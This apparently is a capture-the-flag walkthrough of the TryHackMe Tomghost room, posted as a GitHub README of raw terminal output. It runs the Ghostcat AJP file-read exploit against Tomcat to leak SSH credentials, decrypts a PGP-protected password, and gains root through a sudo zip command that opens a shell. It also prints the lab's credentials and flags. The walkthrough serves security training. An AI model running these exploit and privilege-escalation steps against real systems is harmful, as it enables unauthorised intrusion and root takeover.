Skip to content

Latest commit

 

History

History
227 lines (204 loc) · 8.92 KB

README.md

File metadata and controls

227 lines (204 loc) · 8.92 KB
Raw

TomGhost_Workthrough

TryHackMe box Tomghost Workthrough

sudo nmap -sC -sV 10.10.65.36 Starting Nmap 7.92SVN ( https://nmap.org ) at 2022-07-31 18:47 IST Stats: 0:00:10 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan Service scan Timing: About 50.00% done; ETC: 18:47 (0:00:06 remaining) Nmap scan report for 10.10.65.36 Host is up (0.21s latency). Not shown: 996 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) 53/tcp open tcpwrapped 8009/tcp open ajp13 Apache Jserv (Protocol v1.3) | ajp-methods: |_ Supported methods: GET HEAD POST OPTIONS 8080/tcp open http Apache Tomcat 9.0.30 |_http-title: Apache Tomcat/9.0.30 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 17.72 seconds

cd Ghostcat-CNVD-2020-10487 ls ajp-execute.png ajp-read.png ajp-save.png ajpShooter.py README.md python3 ajpShooter.py http://10.10.65.36 8009 /WEB-INF/web.xml

   _    _         __ _                 _            
  /_\  (_)_ __   / _\ |__   ___   ___ | |_ ___ _ __ 
 //_\\ | | '_ \  \ \| '_ \ / _ \ / _ \| __/ _ \ '__|
/  _  \| | |_) | _\ \ | | | (_) | (_) | ||  __/ |   
\_/ \_// | .__/  \__/_| |_|\___/ \___/ \__\___|_|   
     |__/|_|                                        
                                            00theway,just for test

usage: ajpShooter.py [-h] [--ajp-ip AJP_IP] [-H HEADER] [-X {GET,POST,HEAD,OPTIONS,PROPFIND}] [-d DATA] [-o OUT_FILE] [--debug] url ajp_port target_file {read,eval} ajpShooter.py: error: the following arguments are required: shooter

python3 ajpShooter.py http://10.10.65.36 8009 /WEB-INF/web.xml read

   _    _         __ _                 _            
  /_\  (_)_ __   / _\ |__   ___   ___ | |_ ___ _ __ 
 //_\\ | | '_ \  \ \| '_ \ / _ \ / _ \| __/ _ \ '__|
/  _  \| | |_) | _\ \ | | | (_) | (_) | ||  __/ |   
\_/ \_// | .__/  \__/_| |_|\___/ \___/ \__\___|_|   
     |__/|_|                                        
                                            00theway,just for test

[<] 200 200 [<] Accept-Ranges: bytes [<] ETag: W/"1261-1583902632000" [<] Last-Modified: Wed, 11 Mar 2020 04:57:12 GMT [<] Content-Type: application/xml [<] Content-Length: 1261

Welcome to Tomcat Welcome to GhostCat skyfuck:8730281lkjlkjdqlksalks

> ssh [email protected] The authenticity of host '10.10.65.36 (10.10.65.36)' can't be established. ED25519 key fingerprint is SHA256:tWlLnZPnvRHCM9xwpxygZKxaf0vJ8/J64v9ApP8dCDo. This host key is known by the following other names/addresses: ~/.ssh/known_hosts:6: [hashed name] Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '10.10.65.36' (ED25519) to the list of known hosts. [email protected]'s password: Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-174-generic x86_64)

The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law.

skyfuck@ubuntu:$ cd .. skyfuck@ubuntu:/home$ cd .. skyfuck@ubuntu:/$ ls bin boot dev etc home initrd.img initrd.img.old lib lib64 lost+found media mnt opt proc root run sbin srv sys tmp usr var vmlinuz vmlinuz.old skyfuck@ubuntu:/$ cd skyfuck@ubuntu:$ ls credential.pgp tryhackme.asc skyfuck@ubuntu:$ cd .. skyfuck@ubuntu:/home$ ls merlin skyfuck skyfuck@ubuntu:/home$ cd skyfuck/ skyfuck@ubuntu:$ ls credential.pgp tryhackme.asc skyfuck@ubuntu:$ gpg -d credential.pgp gpg: directory /home/skyfuck/.gnupg' created gpg: new configuration file /home/skyfuck/.gnupg/gpg.conf' created gpg: WARNING: options in /home/skyfuck/.gnupg/gpg.conf' are not yet active during this run gpg: keyring /home/skyfuck/.gnupg/secring.gpg' created gpg: keyring `/home/skyfuck/.gnupg/pubring.gpg' created gpg: encrypted with ELG-E key, ID 6184FBCC gpg: decryption failed: secret key not available skyfuck@ubuntu:$ pgp --import tryhackme.asc The program 'pgp' is currently not installed. To run 'pgp' please ask your administrator to install the package 'pgpgpg' skyfuck@ubuntu:$ gpg --import tryhackme.asc gpg: key C6707170: secret key imported gpg: /home/skyfuck/.gnupg/trustdb.gpg: trustdb created gpg: key C6707170: public key "tryhackme [email protected]" imported gpg: key C6707170: "tryhackme [email protected]" not changed gpg: Total number processed: 2 gpg: imported: 1 gpg: unchanged: 1 gpg: secret keys read: 1 gpg: secret keys imported: 1 skyfuck@ubuntu:$ gpg -d credential.pgp

You need a passphrase to unlock the secret key for user: "tryhackme [email protected]" 1024-bit ELG-E key, ID 6184FBCC, created 2020-03-11 (main key ID C6707170)

gpg: gpg-agent is not available in this session gpg: WARNING: cipher algorithm CAST5 not found in recipient preferences gpg: encrypted with 1024-bit ELG-E key, ID 6184FBCC, created 2020-03-11 "tryhackme [email protected]" merlin:asuyusdoiuqoilkda312j31k2j123j1g23g12k3g12kj3gk12jg3k12j3kj123jskyfuck@ubuntu:$ skyfuck@ubuntu:$ su merlin Password: su: Authentication failure skyfuck@ubuntu:$ su merlin Password: merlin@ubuntu:/home/skyfuck$ ls credential.pgp tryhackme.asc merlin@ubuntu:/home/skyfuck$ cd .. merlin@ubuntu:/home$ cd .. merlin@ubuntu:/$ cd .. merlin@ubuntu:/$ cd home merlin@ubuntu:/home$ cd merlin merlin@ubuntu:$ ls user.txt merlin@ubuntu:$ cat user.txt #THM{GhostCat_1s_so_cr4sy} merlin@ubuntu:$ sudo -l -l Matching Defaults entries for merlin on ubuntu: env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

User merlin may run the following commands on ubuntu:

Sudoers entry: RunAsUsers: root RunAsGroups: root Options: !authenticate Commands: /usr/bin/zip merlin@ubuntu:$ TF=$(mktemp -u) merlin@ubuntu:$ sudo zip $TF /etc/hosts -T -TT 'sh #' adding: etc/hosts (deflated 31%)

whoami

root

ls -l

total 4 -rw-rw-r-- 1 merlin merlin 26 Mar 10 2020 user.txt

ls-la

sh: 3: ls-la: not found

ls -la

total 36 drwxr-xr-x 4 merlin merlin 4096 Mar 10 2020 . drwxr-xr-x 4 root root 4096 Mar 10 2020 .. -rw------- 1 root root 2090 Mar 10 2020 .bash_history -rw-r--r-- 1 merlin merlin 220 Mar 10 2020 .bash_logout -rw-r--r-- 1 merlin merlin 3771 Mar 10 2020 .bashrc drwx------ 2 merlin merlin 4096 Mar 10 2020 .cache drwxrwxr-x 2 merlin merlin 4096 Mar 10 2020 .nano -rw-r--r-- 1 merlin merlin 655 Mar 10 2020 .profile -rw-r--r-- 1 merlin merlin 0 Mar 10 2020 .sudo_as_admin_successful -rw-rw-r-- 1 merlin merlin 26 Mar 10 2020 user.txt

ls -al

total 36 drwxr-xr-x 4 merlin merlin 4096 Mar 10 2020 . drwxr-xr-x 4 root root 4096 Mar 10 2020 .. -rw------- 1 root root 2090 Mar 10 2020 .bash_history -rw-r--r-- 1 merlin merlin 220 Mar 10 2020 .bash_logout -rw-r--r-- 1 merlin merlin 3771 Mar 10 2020 .bashrc drwx------ 2 merlin merlin 4096 Mar 10 2020 .cache drwxrwxr-x 2 merlin merlin 4096 Mar 10 2020 .nano -rw-r--r-- 1 merlin merlin 655 Mar 10 2020 .profile -rw-r--r-- 1 merlin merlin 0 Mar 10 2020 .sudo_as_admin_successful -rw-rw-r-- 1 merlin merlin 26 Mar 10 2020 user.txt

cd ..

ls -a

. .. merlin skyfuck

cd ..

ls

bin boot dev etc home initrd.img initrd.img.old lib lib64 lost+found media mnt opt proc root run sbin srv sys tmp usr var vmlinuz vmlinuz.old

cd root

ls

root.txt ufw

cat root.txt

THM{Z1P_1S_FAKE}